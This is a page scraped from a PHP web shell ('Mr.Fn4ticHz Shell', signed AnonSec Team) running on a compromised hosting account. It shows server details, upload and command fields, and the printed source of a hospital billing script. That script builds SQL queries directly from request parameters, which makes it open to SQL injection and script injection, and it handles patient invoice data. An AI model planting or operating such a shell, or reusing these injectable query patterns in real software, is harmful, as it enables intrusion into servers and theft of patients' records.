Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.144.37.12
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//edit_hospital_Course.php
<?php
session_start();
require_once("../dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$DisplayForm=True;
		$sql= "SELECT * FROM patient_invace WHERE prescriptionid='$_GET[prescriptionid]' AND discription='Admission_fees' AND status='Paid'";
		$qsql = mysqli_query($con,$sql);
		if($rh = mysqli_fetch_array($qsql))
		{
$DisplayForm=False;
echo "<script>window.location='Print_HospitalCourseFinalPay.php?prescriptionid=$rh[prescriptionid]&patientid=$_GET[patientid]'</script>";
}
if($DisplayForm)
{
?>

	      
	      	
<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../patientmanager.php');
include("header.php");
include("dashboarddocument.php");
 if(isset($_POST['Update'])) 
{
 
$sql="UPDATE patient_invace SET created_at='" . $_POST['created_at']. "' WHERE   invaceid='" . $_GET['invaceid'] . "'";

$qsql = mysqli_query($con,$sql);
    	
    	
	if($qsql==1){
	    
	echo "<script>alert('Update successfully');</script>
	<script>window.location='billingset.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]'</script>
	</script>";
}

}
?>
<style>

#topright {
    position: absolute;
    right: 0;
    top: 0;
     margin-top: 73px;
       margin-right: 30px;
    display: block;
    height: 70px;
    width: 70px;
    background: url(TRbanner.gif) no-repeat;
    text-indent: -999em;
    text-decoration: none;
}
#toprightj {
    position: absolute;
    right: 0;
    top: 0;
     margin-top: 73px;
       margin-right: 120px;
    display: block;
    height: 70px;
    width: 70px;
    background: url(TRbanner.gif) no-repeat;
    text-indent: -999em;
    text-decoration: none;
}


#toprightb {
   
    position: absolute;
    right: 0;
    top: 0;
     margin-top: 73px;
       margin-right: 200px;
    display: block;
    height: 70px;
    width: 70px;
    background: url(TRbanner.gif) no-repeat;
    text-indent: -999em;
    text-decoration: none;
}

       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
               <style>
 
h2 {
  color: #4287f5;
}
a img {
  border: none;
}

#memo {
  padding-top: 50px;
  margin: 0 20px 0 60px;
  border-bottom: 1px solid #ddd;
  height: 150px;
}
#memo .logo {
  float: left;
  margin-right: 20px;
}
#memo .logo img {
  width: 150px;
  height: 100px;
}
#memo .company-info {
  float: right;
  text-align: right;
}
#memo .company-info > div:first-child {

  font-weight: bold;
  font-size: 22px;
  color: #1e73be;
}
#memo .company-info span {
  font-size: 11px;
  min-width: 20px;
}

</style>
 <div class="content-wrapper">
          	   <div class='center'>
<section id="memo">

        <div class="logo">
            <?php
            $narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
 $sql ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
{
            $sql ="SELECT * FROM hco WHERE adminid='$rs[entered_by]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
			{
		 $sql ="SELECT * FROM admin WHERE id='$rs[adminid]'";
		$qsql = mysqli_query($con,$sql);
		if($ra = mysqli_fetch_array($qsql))
		{
			    echo"
			         <img data-logo='' src='uploads/$rs[Logo]' />
     </div>
              <div class='company-info'>
          <div>$ra[hsname]</div>
          <div>
        <span style='font-size:18px'>$rs[Street]&nbsp;|&nbsp;$rs[Locality]</br>$ra[EmailID]&nbsp;|&nbsp; $ra[numbers]</p></span>
            </div>
   ";           
		}
			}  
		}
          ?>
    <br>
      </section>
      <br>
      <?php
include("dbconnection.php");
$sql ="SELECT * FROM addaspatient WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
$qsql = mysqli_query($con,$sql);
if($rs = mysqli_fetch_array($qsql))

         $sql1 ="SELECT * FROM patient WHERE patientid='$rs[patientid]'";
		$qsql1 = mysqli_query($con,$sql1);
		if($rspi1 = mysqli_fetch_array($qsql1))
		
	$sqlpatient = "SELECT * FROM patient_invace WHERE prescriptionid='$rs[prescriptionid]' AND 	patientid='$_GET[patientid]' AND invaceid='$_GET[invaceid]'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	
	$sqlpatient1 = "SELECT * FROM site_users WHERE userno='$rsp[entered_by]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	if($rsn = mysqli_fetch_array($qsqlpatient1))
	
	    echo"
<div class='checkbox'><span style='float: left; font-size:19px;'>Date : $rsp[created_at]</span><span style='float: right; font-size:19px;'>Invoice Number :<b>$rsp[invaceid]</b></span></div>
<br>
<div class='checkbox'><span style='float: left; font-size:19px;'>UHID : $rspi1[patientid]</span><span style='float: right; font-size:19px;'>Name :<b>$rspi1[patientname]</b></span></div>
     <br>
     <div class='checkbox'><span style='float: left; font-size:19px;'>Age: $rspi1[dob]</span><span style='float: right; font-size:19px;'>SEX :<b>$rspi1[gendor]</b></span></div>
              <div class='card-body'>";  ?>
                      
        <table class="table  table-hover" id="myTable" border='1'>
               
                
<?php
include("dbconnection.php");
$sql ="SELECT * FROM addaspatient WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
$qsql = mysqli_query($con,$sql);
while($rs = mysqli_fetch_array($qsql))
{
	$sqlpatient = "SELECT * FROM patient_invace WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND invaceid='$_GET[invaceid]'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	while($rsp = mysqli_fetch_array($qsqlpatient))
	{
	$sqlpatient1 = "SELECT * FROM site_users WHERE userno='$rsp[entered_by]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
	    
	    		
 $sql51 ="SELECT * FROM Oxygen WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql51 = mysqli_query($con,$sql51);
		if($rt51 = mysqli_fetch_array($qsql51))
		
          $duration= $rt51['duration'];
          
            echo "<form name='signup' method='post'>
            <tr> <td><strong>Date & Time </strong></td>  <td>&nbsp;<input type='text' name='created_at' id='created_at' value='$rsp[created_at]'></td></tr>
            
          <tr><td><strong>Towards </strong></td>
          <td>
           $rsp[discription]
           
           
            	";
            	 if($rsp['discription']=='Oxygen' && $rsp['pagetype']==$rt51[id]){
	  
                 $p=$rsp[pricetotal] ;
                $h=$duration;
                $pricedue1=$p*$h;
                echo "<input type='text' name='duration' id='duration' value='$duration'/>".'<br>';
                echo "<input type='text' name='pricetotal' id='pricetotal' value='$pricedue1'/>";
                echo "
              		
              	";
	    }else{
	       $pricedue1=$rsp[pricetotal]; 
	    }
	   
          echo  "</td></tr>
              	<tr><td><strong>Price </strong></td>	<td><input type='text' name='pricetotal' id='pricetotal' value='$rsp[pricetotal]'/> <br>
              	
              		
              	
              			";
              			$usertype=$rsp['status'];
if($usertype == 'Paid'){
    echo "Paid ";
} else{
    echo "Due  <b>$pricedue</b>
    	
    ";
}echo "</td></tr>
          <tr><td><strong>Assisted by </strong></td>  <td>&nbsp;$rsn[name]</td>  		 
              					 
          </tr>                   
          
          ";
}
}
}
?>
<tr><td colspan='3'><input type='submit' value='Update' name='Update' id='Update' class='btn btn-info'></td></tr>
</form>
<tr><td colspan='3'>

	</form>
    
	 <br>

</td></tr>
        </table>        
     
      
              <br>
              
      </div>
          <script>
        $(document).on("change keyup blur", "#chDiscount", function() {
            var main = $('#cBalance').val();
            var disc = $('#chDiscount').val();
            var dec = (disc / 100).toFixed(2); //its convert 10 into 0.10
            var mult = main * dec; // gives the value for subtract from main value
            var discont = main - mult;
            $('#result2').val(discont);
        });
          var table = document.getElementById("myTable"), sumVal2 = 0, sumVal1 = 0, sumVal3 = 0;
            
            $(".price2").each(function() {
                    sumVal2 += Number($(this).val());
                    });
            document.getElementById("result").innerHTML = "" + sumVal2;
            $('#cBalance').val(sumVal2);
            $('#result2').val(sumVal2);
            
            
            
            console.log(sumVal2);
            
          
        $(".price1").each(function() {
                    sumVal1 += Number($(this).val());
                    });
            document.getElementById("val1").innerHTML = "" + sumVal1;
            console.log(sumVal1);
              
            $(".price3").each(function() {
                    sumVal3 += Number($(this).val());
                    });
            document.getElementById("val3").innerHTML = "" + sumVal3;
            console.log(sumVal3);
            
      
            
    </script>
    <?php
}
?>

     

Anon7 - 2022
AnonSec Team